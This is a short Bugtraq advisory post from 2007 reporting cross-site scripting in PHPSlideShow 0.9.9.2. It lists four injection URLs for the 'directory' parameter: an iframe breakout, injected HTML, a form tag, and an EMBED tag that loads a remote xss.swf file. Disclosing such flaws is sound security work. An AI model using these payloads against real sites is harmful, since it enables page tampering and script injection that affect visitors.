Bugtraq mailing list archives
PHPSlideShow XSS Update
From: morin.josh () gmail com
Date: 27 Nov 2007 21:16:54 -0000
Vendor Site: http://www.zinkwazi.com/wp/scripts/ Version affected: 0.9.9.2 URL:http://www.example.com/scripts/demo/phpslideshow.php?directory=photos BID ref: 26576 By Jose Luis Góngora Fernández PHPSlideShow is also susceptible the following inputs: 1.http://www.yoursite.com/scripts/demo/phpslideshow.php?directory="><iframe> 2.http://www.yoursite.com/scripts/demo/phpslideshow.php?directory=<html><font color="Red"><b>Pwned</b></font></html> 3.http://www.yoursite.com/scripts/demo/phpslideshow.php?directory=<EMBED SRC="http://site.com/xss.swf" 4.http://www.yoursite.com/scripts/demo/phpslideshow.php?directory=FORM%20ACTION=%22search.php%22%20METHOD=%22GET%22%3E Discovered by: Joshua Morin
Current thread:
- PHPSlideShow XSS Update morin . josh (Nov 27)